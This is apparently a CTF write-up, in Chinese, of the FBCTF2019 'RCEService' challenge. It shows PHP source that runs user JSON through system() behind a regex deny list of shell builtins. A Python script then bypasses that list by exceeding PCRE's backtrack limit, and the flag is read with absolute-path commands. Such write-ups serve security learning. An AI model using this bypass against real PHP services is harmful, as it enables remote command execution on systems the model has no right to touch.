FBCTF2019-RCEService

[FBCTF2019]RCEService

image-20210418101122350

提交json格式的命令?

原本题目是提供了源码的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
$json = $_REQUEST['cmd'];

if (!is_string($json)) {
echo 'Hacking attempt detected<br/><br/>';
} elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
echo 'Hacking attempt detected<br/><br/>';
} else {
echo 'Attempting to run command:<br/>';
$cmd = json_decode($json, true)['cmd'];
if ($cmd !== NULL) {
system($cmd);
} else {
echo 'Invalid input';
}
echo '<br/><br/>';
}
}

?>

这里就是preg_match的两种绕过方法之一 :PHP利用PCRE回溯次数限制绕过某些安全限制

https://www.freebuf.com/articles/web/190794.html

php采用pcre作为正则表达式库,为了防止正则表达式的拒绝服务攻击(reDOS),给 pcre 设定了一个回溯次数上限 pcre.backtrack_limit。我们可以通过var_dump(ini_get('pcre.backtrack_limit'));的方式查看当前环境下的上限.

假设我们的回溯次数超过了 100 万,preg_match返回的非 1 和 0,而是 false。

所以,我们可以利用这个特性使得匹配到的1变为false

在构造的json数据中构造,若匹配不到,会一步一步回溯:

1
2
3
4
5
6
import requests

payload = '{"cmd":"ls","haha":"' + "a"*(1000000) + '"}'

res = requests.post("http://8ccd1800-50a8-437a-b276-5606fc62242c.node3.buuoj.cn/", data={"cmd":payload})
print(res.text)

因为putenv('PATH=/home/rceservice/jail');设置了环境变量,我们需要绝对路径来使用命令

Linux命令的位置:/bin,/usr/bin,默认都是全体用户使用,/sbin,/usr/sbin,默认root用户使用

查proc环境变量查不出来,只能查到cmdline……

pwd:/var/www/html

查一下设置的环境变量发现了flag

cat下即可:/bin/cat /home/rceservice/flag

作者

inanb

发布于

2021-04-18

更新于

2021-08-23

许可协议


:D 一言句子获取中...